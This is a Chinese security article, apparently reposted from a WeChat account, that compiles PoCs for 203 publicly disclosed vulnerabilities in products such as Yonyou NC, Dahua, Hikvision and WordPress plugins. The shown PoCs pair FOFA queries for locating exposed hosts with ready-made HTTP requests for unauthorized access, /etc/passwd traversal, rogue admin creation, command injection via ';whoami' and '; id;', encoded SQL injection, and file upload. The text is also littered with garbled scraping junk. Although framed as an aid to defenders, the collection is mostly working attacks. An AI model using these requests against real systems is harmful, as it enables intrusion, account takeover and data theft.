互联网公开漏洞整理202309-202406
9 p' P8 ]1 r+ [# a3 s2 v道一安全 2024-06-05 07:41 北京
( E! F( d( Q* n以下文章来源于网络安全新视界 ,作者网络安全新视界
6 k# { a( t4 T$ X) A: Q' Q: h/ s1 t$ ^" ]% @% N( q$ x; @6 p, ]: D
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
! e: d8 S7 C$ i/ F& [" G; t/ x$ d( n. J1 s3 v6 i/ ^9 Q' }
漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。6 F! c: ~. E, L( E6 _ H1 j$ q" V
6 t3 f$ W" k l, C! G! g: h* S O
安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。, C. { L# m* @9 M2 d1 {* D
+ f- D) |+ H) j, o文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。) t9 o: m" t! D( G, q$ y! U
( x6 r$ F" q0 d. ?9 j
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。5 A+ Z' z) C7 }9 f0 I$ |
y2 x; l3 @1 \: c/ E6 f( V: e0 e8 O, H/ b7 c. P" W
声明+ M: l/ {, f5 c e0 o
" z( t& ~4 I/ k) f W) B7 W
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
0 b$ v5 E/ N7 N* p( C% k
6 x% t& g; U- U, C% S9 q有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。6 `! c0 X9 w2 p( ]
6 i- Z; g4 K7 }2 s |$ p" ^" ?+ E" {
' q4 f- j- q u S q. l
7 k& u) U; O2 g$ v/ y
目录0 }; ]* ]6 R" `6 p* F* A
4 p' ]5 G) S: X$ ^6 C6 P3 k5 b
01
" P) z" s. {- q) ^, @' N, V
2 b3 w$ S! V5 }, N1. StarRocks MPP数据库未授权访问- j' R; p" B9 O" Q
2. Casdoor系统static任意文件读取( t" H- v# G0 s) G" \
3. EasyCVR智能边缘网关 userlist 信息泄漏
+ a# P3 l) O. C0 J2 C4. EasyCVR视频管理平台存在任意用户添加! o+ j. ^6 t- ^9 k8 B0 G" P
5. NUUO NVR 视频存储管理设备远程命令执行
$ n2 b) f% ]/ O" t* J$ w+ a6. 深信服 NGAF 任意文件读取" l, q. n4 p: y0 F" K( t0 }0 ]
7. 鸿运主动安全监控云平台任意文件下载
- J/ w' Q5 ^! Y! r( v' W8. 斐讯 Phicomm 路由器RCE
3 |. P2 V0 U/ t. w g7 e$ J9. 稻壳CMS keyword 未授权SQL注入
+ h( |0 W7 M( i. u, R$ h( u10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
5 P U" z. ?: d. ^+ m11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入+ j0 m4 ~9 z1 D9 ?7 j
12. Jorani < 1.0.2 远程命令执行: O/ Y: Q8 k# i: c: o% T
13. 红帆iOffice ioFileDown任意文件读取
u) h9 ?- I! T# |14. 华夏ERP(jshERP)敏感信息泄露
+ b Y8 b% z: w5 _- x- i15. 华夏ERP getAllList信息泄露, W y& T3 h) c7 h) e% U2 W
16. 红帆HFOffice医微云SQL注入
( [' N! U, n, A# | b; p17. 大华 DSS itcBulletin SQL 注入
) m/ ]* m+ a! N; ?3 |5 }# h# e18. 大华 DSS 数字监控系统 user_edit.action 信息泄露* S+ r6 F. Y- x% F( _. H
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
" c/ O- `/ ~# V3 p20. 大华ICC智能物联综合管理平台任意文件读取
$ I; a6 c" ^+ P21. 大华ICC智能物联综合管理平台random远程代码执行, U' h4 y% A+ M
22. 大华ICC智能物联综合管理平台 log4j远程代码执行! Y* v9 ?3 T& i4 a
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行% H3 a* I! Q0 \1 s4 L$ Y. Q
24. 用友NC 6.5 accept.jsp任意文件上传6 Y& j/ l. X6 m$ r: m5 m6 T
25. 用友NC registerServlet JNDI 远程代码执行* d% C9 h$ P2 `5 z4 h* k: k
26. 用友NC linkVoucher SQL注入
, D' K- h* B' r; k# T9 T* N27. 用友 NC showcontent SQL注入
( | j0 h3 f+ ? R% ~28. 用友NC grouptemplet 任意文件上传
* z5 F1 r! m7 H: J5 E29. 用友NC down/bill SQL注入
6 F$ Q% t- f, |3 G* }* u30. 用友NC importPml SQL注入
/ }3 w0 c( z: ]3 j3 c* B) I31. 用友NC runStateServlet SQL注入
# e2 C- Y! g& C32. 用友NC complainbilldetail SQL注入
/ h. m0 i/ k' r1 }3 u5 j33. 用友NC downTax/download SQL注入* d. n6 [ p( i! H, j e( t
34. 用友NC warningDetailInfo接口SQL注入; c' O1 A- {5 V2 M( e) k
35. 用友NC-Cloud importhttpscer任意文件上传; Q- ^" X4 `1 z, H$ U& ]
36. 用友NC-Cloud soapFormat XXE+ D* ?4 t/ }/ a* U& R
37. 用友NC-Cloud IUpdateService XXE7 @- x3 g* s) [* T
38. 用友U8 Cloud smartweb2.RPC.d XXE
7 D, D" u: Q6 C+ x' K39. 用友U8 Cloud RegisterServlet SQL注入9 f5 A$ f4 q/ g0 s
40. 用友U8-Cloud XChangeServlet XXE
* t; V! M5 u# W! I41. 用友U8 Cloud MeasureQueryByToolAction SQL注入1 ~1 k0 W: l1 G- ?3 J1 X# J5 c
42. 用友GRP-U8 SmartUpload01 文件上传* s& d1 S( c' z
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
: P" D# F) w6 v. g$ W44. 用友GRP-U8 bx_dj_check.jsp SQL注入. w: d$ M' W' `0 q) W/ G; r! j9 ]
45. 用友GRP-U8 ufgovbank XXE( f; a* N9 P' a4 J) C- l
46. 用友GRP-U8 sqcxIndex.jsp SQL注入* y3 {# G, t, z; F
47. 用友GRP A++Cloud 政府财务云 任意文件读取3 x# ~" P% C9 e' I
48. 用友U8 CRM swfupload 任意文件上传2 u/ j5 S' e" e& _2 ^% M t
49. 用友U8 CRM系统uploadfile.php接口任意文件上传8 q: @+ X: O5 B* I( `
50. QDocs Smart School 6.4.1 filterRecords SQL注入
0 N+ D+ v/ F6 X* u8 K" A51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
2 s$ l2 d) i2 R$ I; Y: Q" Z7 K+ v2 o52. 泛微E-Office json_common.php sql注入
% i* ?. E* Q) w1 E53. 迪普 DPTech VPN Service 任意文件上传; h3 s+ h& K3 ]# L8 }
54. 畅捷通T+ getstorewarehousebystore 远程代码执行) G' Z; k% E/ ]+ R1 w
55. 畅捷通T+ getdecallusers信息泄露
# \' g5 C3 V0 \2 b8 C56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE2 H4 h; A' O/ h! O7 u: f/ e, E- l
57. 畅捷通T+ keyEdit.aspx SQL注入
6 Q# h1 V% q0 y, u: z# L% L58. 畅捷通T+ KeyInfoList.aspx sql注入2 y% h+ ]9 v$ m: h* L: K# |
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行 ~$ w% e; O. z
60. 百卓Smart管理平台 importexport.php SQL注入8 B, o- j C9 a$ s% p1 i7 K
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传* J3 N W+ r ^* Z9 n4 F2 B3 }' ]
62. IP-guard WebServer 远程命令执行& h' E( L5 y7 ?
63. IP-guard WebServer任意文件读取
! i- v( ^. N5 q3 Q ~64. 捷诚管理信息系统CWSFinanceCommon SQL注入
& }1 U2 i6 n& y% R w. Y65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过! u2 ^2 w: w9 \3 W* O/ U, J3 d
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入: S! p" f' Z. N4 |
67. 万户ezOFFICE wpsservlet任意文件上传3 P% q. r+ z; v& ~3 H
68. 万户ezOFFICE wf_printnum.jsp SQL注入
1 u! ]8 |0 v# \4 {69. 万户 ezOFFICE contract_gd.jsp SQL注入, B6 K2 o0 r+ ?- k: N/ i4 h L
70. 万户ezEIP success 命令执行8 m5 T1 }+ C2 d7 z& O' g4 q6 t5 y
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入& z% P5 t: O( D4 j" f
72. 致远OA getAjaxDataServlet XXE
5 C0 ] A, t: W: ?& I" F) B73. GeoServer wms远程代码执行
, t7 y4 K9 S! g3 S" J3 u$ r74. 致远M3-server 6_1sp1 反序列化RCE
4 r4 }- [2 Z" G' ~75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE# \! w+ P$ e, d ]& ]* g, {9 x
76. 新开普掌上校园服务管理平台service.action远程命令执行
$ ]5 N7 H- j% `77. F22服装管理软件系统UploadHandler.ashx任意文件上传
' b( C) G U0 |4 R" |$ A. y78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
) x/ T0 w" }( Q0 F; f! G/ p79. BYTEVALUE 百为流控路由器远程命令执行0 |- ` f3 \# k$ q0 f0 I2 S" r
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传1 Y% `" g' w, a" z. o# y, Z1 T' @3 g
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露4 P/ r! v% @( L- R% E
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
8 p( \2 N' j7 \+ Z9 |) t" T83. JeecgBoot testConnection 远程命令执行
" Y3 x: u( w. |% b/ s84. Jeecg-Boot JimuReport queryFieldBySql 模板注入/ U: p8 @* M; Q' \5 g4 R) s. @
85. SysAid On-premise< 23.3.36远程代码执行" t% w# C# v/ Z1 ?9 k) F O
86. 日本tosei自助洗衣机RCE
3 v" w6 m- V; G+ F4 F7 s) Y87. 安恒明御安全网关aaa_local_web_preview文件上传
+ g7 M! t m5 g, b: A88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
( m$ M4 ?, w$ {/ f l% ?& c89. 致远互联FE协作办公平台editflow_manager存在sql注入' b3 i4 S3 F6 l7 `
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
9 I6 P, M/ N* _7 h- \- d7 X, u91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
: u+ g( ^) n5 [, |/ \6 p% y92. 海康威视运行管理中心session命令执行' J" q/ \3 `# V( {! d, {8 H
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传% {! r0 F$ f. J, W
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传2 c: ]; ~2 A4 t! }1 \! w5 c
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
: c3 Q' G. o$ N2 D) b0 _96. Apache OFBiz 18.12.11 groovy 远程代码执行7 C% F! p: a! o# Z3 z0 c! {6 r& _9 P
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
- A/ }( E( j+ \7 w T98. SpiderFlow爬虫平台远程命令执行
* X' I& I4 O6 Z% J$ u" J# L99. Ncast盈可视高清智能录播系统busiFacade RCE* C6 a7 L4 W9 |; I/ p k" r
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传3 ]7 O* J$ A7 X0 W$ @
101. ivanti policy secure-22.6命令注入
8 H0 w( j( d. V" ^1 X102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
7 }. d. e) D( Y6 X' ?103. Ivanti Pulse Connect Secure VPN XXE* D& j4 Z: ?3 |7 d: I
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露# k( ^) A& H' H$ {) c
105. SpringBlade v3.2.0 export-user SQL 注入
! v$ @2 P. [+ W) D7 V2 w106. SpringBlade dict-biz/list SQL 注入, c9 j9 I7 F! A( m6 Q5 D" ], i
107. SpringBlade tenant/list SQL 注入
% u. @; j- T7 c; v7 Q& a108. D-Tale 3.9.0 SSRF
$ S+ Q' F$ Z# t. r6 F w u109. Jenkins CLI 任意文件读取0 ? w* r C% H$ v
110. Goanywhere MFT 未授权创建管理员
1 h4 f) d. ?) e( _1 k" @111. WordPress Plugin HTML5 Video Player SQL注入
q* @. r' j" d% S7 q* t, }# D112. WordPress Plugin NotificationX SQL 注入5 i+ N: I4 m! b) ~% w/ D2 W
113. WordPress Automatic 插件任意文件下载和SSRF7 {& b" e! |. {. C9 `
114. WordPress MasterStudy LMS插件 SQL注入/ y8 i9 }1 A0 _4 A. T: U
115. WordPress Bricks Builder <= 1.9.6 RCE1 @$ S" W. C; n
116. wordpress js-support-ticket文件上传
0 [+ g4 L% f8 m* E& k' Z117. WordPress LayerSlider插件SQL注入, Y, U; j. O7 H9 u$ b5 j
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传& M% g& s) u A9 L9 M# M5 x
119. 北京百绰智能S20后台sysmanageajax.php sql注入
9 V- m6 ^. h0 D- Q1 n. P: h( O120. 北京百绰智能S40管理平台导入web.php任意文件上传2 G6 @/ @" \& u
121. 北京百绰智能S42管理平台userattestation.php任意文件上传$ }( g8 B4 E5 q* w; q) L r: b
122. 北京百绰智能s200管理平台/importexport.php sql注入
/ X) c {7 h6 C123. Atlassian Confluence 模板注入代码执行- B+ O* P% T- o% u/ @4 z3 X
124. 湖南建研工程质量检测系统任意文件上传
; u7 Y) e5 O# V8 y8 U125. ConnectWise ScreenConnect身份验证绕过
) n9 G# w) c1 B9 m# _6 C2 p7 `' s126. Aiohttp 路径遍历1 a6 \& x) Z; @- ?! P
127. 广联达Linkworks DataExchange.ashx XXE
. x1 p5 D3 q: t9 ~7 A1 I, e128. Adobe ColdFusion 反序列化
7 k) Y5 J( \) D. @8 {5 c# A129. Adobe ColdFusion 任意文件读取4 ]/ w& P2 e. x' D1 L. Z) x
130. Laykefu客服系统任意文件上传
6 N* c& {0 `7 U131. Mini-Tmall <=20231017 SQL注入3 O1 e; P( B# l7 H
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过( N# U; P$ E x, G0 S
133. H5 云商城 file.php 文件上传) x# Y* q! s4 O$ @4 j1 ~6 o
134. 网康NS-ASG应用安全网关index.php sql注入
; h8 q; O. u& Y1 e9 L# M135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
( H1 m1 _ a) _" q7 i J136. NextChat cors SSRF
+ D8 W% [* [% Z8 n137. 福建科立迅通信指挥调度平台down_file.php sql注入
# R5 C" C* F/ x' p! a: l9 K! Z+ D138. 福建科立讯通信指挥调度平台pwd_update.php sql注入6 k% p# k9 m7 b& _
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
. ?, r0 Z2 W( @& _0 _+ x& q; m140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入# u: G! m% X7 s/ t3 r
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
, A$ m: @* M4 b7 v142. CMSV6车辆监控平台系统中存在弱密码 \. u) p7 [" D' c
143. Netis WF2780 v2.1.40144 远程命令执行- q# R3 j$ f% c* X5 ^/ h
144. D-Link nas_sharing.cgi 命令注入
h7 J. {( ?& Q145. Palo Alto Networks PAN-OS GlobalProtect 命令注入6 w+ E, i! _0 P$ H. E! h q+ F
146. MajorDoMo thumb.php 未授权远程代码执行
1 v$ R: X% n5 R, e7 c147. RaidenMAILD邮件服务器v.4.9.4-路径遍历/ f6 y6 N! g, F9 p3 O
148. CrushFTP 认证绕过模板注入8 z G- I/ C7 l8 a+ W
149. AJ-Report开源数据大屏存在远程命令执行
! B, z! U' m, C- I& t8 C150. AJ-Report 1.4.0 认证绕过与远程代码执行. I0 x) m, y0 t( i2 q
151. AJ-Report 1.4.1 pageList sql注入
! _0 \ T, N& Z) m B, h152. Progress Kemp LoadMaster 远程命令执行
9 H6 e& ]" `) a. \) ?5 d153. gradio任意文件读取" P( C8 [* y' o9 i
154. 天维尔消防救援作战调度平台 SQL注入
`2 N) w H% z9 W$ @5 H, k155. 六零导航页 file.php 任意文件上传
$ E0 t8 x' u* j- p' d156. TBK DVR-4104/DVR-4216 操作系统命令注入
) A7 h6 }- C3 D5 i! X157. 美特CRM upload.jsp 任意文件上传$ h9 p4 f- L( Q$ ]; h- W
158. Mura-CMS-processAsyncObject存在SQL注入/ y4 j6 y" {- X7 b. n+ X9 W9 i3 y
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
" D: G; F, n0 o, u! G: K160. Sonatype Nexus Repository 3目录遍历与文件读取
) O, K m6 G( o& I: B, B161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传! w8 |! T V* i2 _
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传5 W5 l i) o0 L5 S0 G/ B9 {
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
& {) g, }0 }8 w; m: z$ w7 p164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传- F5 Y: k5 e7 c8 o/ a$ z
165. OrangeHRM 3.3.3 SQL 注入
* V% d0 w8 f! i* j; e( R$ i8 b' w166. 中成科信票务管理平台SeatMapHandler SQL注入
0 V' F6 z4 ]0 B x# ^. ]0 ]7 r167. 精益价值管理系统 DownLoad.aspx任意文件读取+ ^" L+ q2 w' _% z: v1 I w
168. 宏景EHR OutputCode 任意文件读取
. L H2 q0 E) y5 {1 C: F& c169. 宏景EHR downlawbase SQL注入1 V6 J8 O3 o; C
170. 宏景EHR DisplayExcelCustomReport 任意文件读取3 T4 r) e7 H; R7 |- j9 S8 {
171. 通天星CMSV6车载定位监控平台 SQL注入
7 S% Y2 g" G9 m8 c172. DT-高清车牌识别摄像机任意文件读取5 o4 e! P- B' c$ w u, O! F2 N
173. Check Point 安全网关任意文件读取
; b& L( V2 G6 m174. 金和OA C6 FileDownLoad.aspx 任意文件读取
5 b Z ~ O$ H9 y7 Z, \175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
/ d. y# M& V/ r; T8 z' I176. 电信网关配置管理系统 rewrite.php 文件上传% ^4 @" a. k! s. u0 W, i7 t: k
177. H3C路由器敏感信息泄露
3 b3 X2 ^& L- H178. H3C校园网自助服务系统-flexfileupload-任意文件上传+ O! ]" n2 R! r5 g- u, N/ {
179. 建文工程管理系统存在任意文件读取
* `8 b" Y# X. c/ }# S2 k1 q180. 帮管客 CRM jiliyu SQL注入$ t: R+ [( a1 @4 ^! N
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入8 }" ^- j K$ K: d* A$ b
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
, I! D! v# h% \7 J7 |183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入# V6 ]1 Z. S1 a; Y }) M( }
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
9 `+ |0 U. T# c! P185. 瑞友天翼应用虚拟化系统SQL注入6 t5 J' ]. H6 v9 s4 h4 y
186. F-logic DataCube3 SQL注入
# v* v# l/ H9 N+ C187. Mura CMS processAsyncObject SQL注入
7 O: q; C1 ^& ^! X6 l# V0 y188. 叁体-佳会视频会议 attachment 任意文件读取
- d6 l) y& c _189. 蓝网科技临床浏览系统 deleteStudy SQL注入
9 M W$ M& k6 S( f& S4 l190. 短视频矩阵营销系统 poihuoqu 任意文件读取, l- a; Q5 y8 V( B
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入% V6 P1 _! Z" F0 z, W' k
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传2 p4 Q& M6 [& u# s! T
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行/ U" Z3 D, j5 n, x! V* m/ |! M
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
5 F4 N- @9 d% L1 }! ~/ q195. 飞鱼星上网行为管理系统 send_order.cgi命令执行 D6 G" I' {8 N7 R$ m7 K1 a' ]# d9 ^
196. 河南省风速科技统一认证平台密码重置
1 w N$ B( |8 q/ A+ o197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
2 I; N, g5 b5 x* P5 }7 T+ Z! o8 o198. 阿里云盘 WebDAV 命令注入4 k" L) i/ n& W T! |( P* Z# h2 X
199. cockpit系统assetsmanager_upload接口 文件上传
, T3 X) K$ o5 R4 q$ Q+ R# `$ A200. SeaCMS海洋影视管理系统dmku SQL注入" U0 J7 n9 M* K N
201. 方正全媒体新闻采编系统 binary SQL注入
5 e4 }3 U O0 Z2 R202. 微擎系统 AccountEdit任意文件上传
" R" K4 ], v5 x- P203. 红海云EHR PtFjk 文件上传* y! P6 y! b1 f) ^( @
3 C7 z# Z; J: t; | F) g
POC列表% [( \- M) Y( L5 h3 {5 l# m
, ?5 x: L/ M7 e5 v02$ K8 W2 p+ r! r
1 ~- K5 Q6 q- a, U' R. z/ g
1. StarRocks MPP数据库未授权访问9 b! [& O0 z0 ]: s6 m2 G
FOFA :title="StarRocks"
- f& M* P: s4 D; X6 B) |7 JGET /mem_tracker HTTP/1.1
! `: J4 s! o0 u$ C) KHost: URL
, J. ~* Z+ b1 z( J& X; `5 G
' W6 x! E* V' m0 T7 Y! |/ N4 z1 \% Q+ Z/ n8 c
2. Casdoor系统static任意文件读取# V1 ]) c: T% }) }
FOFA :title="Casdoor"
7 U2 |9 [' T' f9 PGET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
+ Y) @# {. x. l$ D& z9 F2 IHost: xx.xx.xx.xx:9999. x9 [' R! N0 g; {* O( O9 Z) C+ K
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36. m/ Q- r' M/ B/ D
Connection: close7 V% S5 P) \& j' W0 X9 A: r. {
Accept: */*( D: W6 o w: j `, W
Accept-Language: en S* }/ Y/ A# j' E' A" u8 F4 v% F
Accept-Encoding: gzip$ \: G( ]# Y; j9 o7 v: F' a, x5 D
$ c4 W5 n8 g* K. n. W9 ]; F8 D
! B+ p- B/ v& y" i5 I
3. EasyCVR智能边缘网关 userlist 信息泄漏4 ^% U6 P6 F3 `3 k, N
FOFA :title="EasyCVR": R+ M3 {, u! X5 J1 ^( H
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
% ?5 b+ E& M6 zHost: xx.xx.xx.xx, I' {4 f5 O1 r0 I, |. B
7 ?1 h. z( T& w1 _& {
% D/ ^4 \2 y7 h3 O) s& ?4. EasyCVR视频管理平台存在任意用户添加
! N! E- C6 z1 h+ LFOFA :title="EasyCVR"7 s2 g* E' d3 B/ }
1 ^3 e4 U+ \0 k4 m
password更改为自己的密码md5# S3 ` W& {6 P$ i7 j1 V2 w
POST /api/v1/adduser HTTP/1.1. V, V7 U2 `) I7 |. D
Host: your-ip. E" v/ y* {7 j$ | m. `
Content-Type: application/x-www-form-urlencoded; charset=UTF-85 { u/ m! ]% C& Z0 u; ^& ~2 Z
. F" Y9 l7 {+ S# K% B# p
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
8 {6 ]) J, \5 H2 w/ c a& ^& a' e% |+ n8 @
8 k' [' \$ a/ i% O% t" g# V; q6 w5. NUUO NVR 视频存储管理设备远程命令执行# ~9 s4 Z1 _( ]& T: {8 D' a. G Y
FOFA:title="Network Video Recorder Login"
( I$ d# E! a# A0 wGET /__debugging_center_utils___.php?log=;whoami HTTP/1.12 `3 R7 D6 O; S" ^; l% }/ Q) W
Host: xx.xx.xx.xx3 F8 @' ?2 X' b; j, B
L) n% |! n& k- ^8 I3 r, x
9 Q/ Z& ~" O3 e- s6. 深信服 NGAF 任意文件读取- Z: C! w- ]4 B# v8 @% @# Z0 B
FOFA:title="SANGFOR | NGAF"8 d% [) z6 A, p, e; y1 F) F
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.12 y: R c! h- ]/ H/ |4 P
Host:
8 n8 n6 m3 ?: O- z3 Z+ ^' s8 b+ h ]/ ]
2 D- E* Z8 A% B |8 w# F9 A/ |3 u
7. 鸿运主动安全监控云平台任意文件下载
! R z; I; P2 ^7 ^6 C7 X# C0 @# GFOFA:body="./open/webApi.html"
7 W2 R# d. h3 VGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.14 F4 {1 j8 B$ x& O3 u
Host:8 i4 x4 ~) p+ `. X* F6 p
% D9 L! j9 I4 B4 @9 }
3 p. E2 c: @" j) y1 d
8. 斐讯 Phicomm 路由器RCE
# k5 y) Y: j; R) jFOFA:icon_hash="-1344736688"
) H3 C/ s8 v, i+ [4 q# \. Z默认账号admin登录后台后,执行操作3 @" k9 y: i" Z6 Y9 H
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
9 X9 y, _; K+ ~7 VHost: x.x.x.x
0 L2 y7 n3 z* i* n/ Y% qCookie: sysauth=第一步登录获取的cookie% L0 w/ z) |( j/ z
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
3 ?$ g# b$ ?$ O- {/ o0 ZUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.362 [9 H6 Y. Q' T: t2 w$ _
8 [; j, o+ v$ I& u' r( ?3 N6 A. r
------WebKitFormBoundaryxbgjoytz3 P9 \( T" K1 y: r
Content-Disposition: form-data; name="wifiRebootEnablestatus"
& j" n3 F" @8 v4 ]
- S: _' D: k; x" w# B/ _ G' `%s% x2 n& {; U8 _& _! o. L
------WebKitFormBoundaryxbgjoytz6 F, _$ [ m0 i- F I9 J' r+ l5 o
Content-Disposition: form-data; name="wifiRebootrange"
5 d" N- p& x4 S& \/ z" w, K6 J R% Q$ a4 P3 Z- `- X% K. r
12:00; id;
( f% v, f* g( |& K4 j5 m# K------WebKitFormBoundaryxbgjoytz8 ^% s, V0 l7 F3 W% U3 N
Content-Disposition: form-data; name="wifiRebootendrange"
3 S6 O+ c) P, }+ E
2 Z! D5 X' V' Y, t; v1 U* d%s:
: R2 @1 }* i2 S" J; c! o------WebKitFormBoundaryxbgjoytz
' J! c9 n; m0 V5 m3 f+ J" xContent-Disposition: form-data; name="cururl2"
' Y$ ?. Z; n' W) O/ T
' }0 E1 x* P( x q6 O4 x# r1 R! c N' `3 A1 @. u! y H
------WebKitFormBoundaryxbgjoytz--" @: T+ e: A0 Z% W3 W5 o
8 f% W% G0 ?4 I( m- |- ?, ~
. g, L- V. Z7 U" R9. 稻壳CMS keyword 未授权SQL注入( D4 u0 d+ c1 d6 V* F/ Y) w
FOFA:app="Doccms"$ _/ T( G3 j- o
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1& x( C" c5 u5 `
Host: x.x.x.x+ J7 M' K! {# W% c' J G3 \& r
% F+ B' \6 V: i. Z4 w; \9 ^; k
4 I$ P* H" f0 a0 l' n* o, dpayload为下列语句的二次Url编码0 D% v& b2 A+ }" E$ w4 p
, S5 {; G/ B* G& f
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
4 K4 T4 R6 C9 o! }& R' L: J
/ J$ c# \; i5 {4 H10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
4 ^, _& h0 R: |' m4 jFOFA:icon_hash="953405444"4 J4 l5 A5 \8 w+ j
: |) } ~: g8 G文件上传后响应中包含上传文件的路径
" ~) X0 k3 Q# rPOST /eis/service/api.aspx?action=saveImg HTTP/1.1
9 v! S% L8 ~ u! h. S+ MHost: x.x.x.x:xx
( `3 K* f0 u- rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
* }- J/ m% k: d( s' ~Content-Length: 197
* a6 C# A) O9 ?% [: @! VAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
7 M' z! t3 a6 I9 ^; u7 K7 FAccept-Encoding: gzip, deflate& _7 V% h1 q# I
Accept-Language: zh-CN,zh;q=0.9
0 r' g% m2 Z4 P5 M* i- A- eConnection: close* J$ V$ V8 a* N1 n9 C& v
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
' i' F6 M2 i( E% b* A! s* l" ]& T, |, o0 G* ^! Z |' k& _
------WebKitFormBoundaryxdgaqmqu
2 g, i, C8 `- [+ R; GContent-Disposition: form-data; name="file"filename="icfitnya.txt"
/ G) {% `6 q8 qContent-Type: text/html
7 I. a7 G9 I9 w" h) }0 U9 N1 q
1 S( C. z, h4 p# u$ m8 q$ tjmnqjfdsupxgfidopeixbgsxbf
+ X$ Z6 H* U* M$ X5 z; X------WebKitFormBoundaryxdgaqmqu--. g- ~+ W* r3 P! p" j/ q
1 }& D2 Q5 G1 I1 t0 ^
% f1 t# |7 M* ~7 [* W% E' B' O, ]
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入. T4 K6 n& j4 I
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
